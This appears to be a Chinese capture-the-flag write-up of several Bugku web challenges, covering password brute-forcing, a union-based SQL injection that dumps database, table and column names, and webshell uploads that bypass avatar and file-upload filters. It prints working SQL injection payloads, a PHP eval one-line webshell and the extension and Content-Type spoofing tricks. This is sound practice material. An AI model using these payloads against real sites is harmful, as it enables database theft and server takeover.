[Bugku] web-CTF靶场系列系列详解⑥!!!
平台为“山东安信安全技术有限公司”自研CTF/AWD一体化平台,部分赛题采用动态FLAG形式,避免直接抄袭答案。
平台有题库、赛事预告、工具库、Writeup库等模块。
------------------------------------
bp
打开环境:
直接启用bp爆破
跑出来密码为zxc123
得到flag 
--------------------------------------
成绩查询
开启环境:
打开页面
先测试:输入1,2,3分别能查到1,2,3号学生的成绩;输入1’返回异常,输入1’–+返回异常,输入1’ #或者1’-- +返回正常(所以可以断定sql语句的形式是id = ‘input_id’。常用的闭合方式还用id = “input_id”,id = (“input_id”),id = (‘input_id’)等等),看来过滤了–+
查看列数:观察,表貌似有四列(名字,Math,English,Chinese),输入1’ order by 4#返回正常,输入1’ order by 5#返回异常,看来的确是4列
-------------------
接下来就开始暴库名、表名、字段名
尝试联合查询,记得把前面的查询数据置空,写成id=-1即可,显示正常,说明确确实实存在这四列数据
我们先手遍历一遍 id=-1’ union select 1,2,3,4#
发现有四个表且都有回显,于是 就开始爆破吧
首先爆库名:通过id=-1’ union select 1,2,3,database()#得到数据库名字skctf
然后爆表:通过使用 id=-1’ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# 得到表名:fl4g,sc 
接下来爆字段:通过id=-1’ union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467# //这里需要用16进制(将表名fl4g转换为16进制)绕过
得到字段skctf_flag
最后就是查询数据了:通过使用:id=-1’ union select 1,2,3,skctf_flag from fl4g#
得到flag 
---------------------------------
xxx二手交易市场
开启环境:
打开题目,点击进入链接,是一个二手交易市场平台 
想着可不可能是修改购买价格,然后发现根本没有购买功能,只能先注册登录看看 
感觉昵称可能有注入,下面的信息编辑会不会有注入,还有就是头像文件上传;前两个防护做的挺好的,看看头像上传,上传文件,抓包 
看到后面好长一串,image参数后面是文件后缀JPEG,然后有base 64,再后面应该是图片的base64编码,看看传个一句马试试先把<?php @eval($_POST['yuchen']);?>base64加密一下,提换掉后面的一长串,然后改一下后缀为php
响应了上传的马路径,蚁剑连一下,成功。
打开终端,一层一层往上找,找到flag 
得到flag
----------------------------------
文件上传
开启环境:
打开直接上传一句话木马图片抓包 
修改后缀为php上传 
不行,经过不断尝试发现文件后缀改为php4
头部大写一个字母
数据处Content-Type改为image/jpeg
即可成功绕过
蚁剑连接
-------------------------------------------
[+-<>]
打开环境:
直接使用AmanCTF - Brainfuck/OoK解密
得到flag